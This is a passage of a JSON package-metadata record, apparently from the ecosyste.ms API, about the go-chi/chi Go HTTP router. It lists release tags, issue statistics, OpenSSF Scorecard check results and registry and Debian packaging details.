chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.222Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":10.144688698177207,"dependent_packages_count":8.50192125563756,"stargazers_count":0.48974741209461364,"forks_count":0.8853101923317619,"docker_downloads_count":null,"average":5.005416889560285},"purl":"pkg:golang/github.com/go-chi/chi/v2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi/v2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi/v2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/v2/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv2/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13645566,"name":"golang-github-go-chi-chi","ecosystem":"debian","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["golang"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T03:13:38.546Z","latest_release_published_at":"2026-02-12T03:13:38.546Z","latest_release_number":"5.2.0-1","last_synced_at":"2026-03-13T10:12:14.848Z","created_at":"2026-02-12T03:13:38.342Z","updated_at":"2026-08-08T10:51:35.267Z","registry_url":"https://tracker.debian.org/pkg/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":"https://packages.debian.org/trixie/golang-github-go-chi-chi","metadata":{"component":"main","architecture":"all","priority":"extra","binary":"golang-github-go-chi-chi-dev","standards_version":"4.7.0","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/g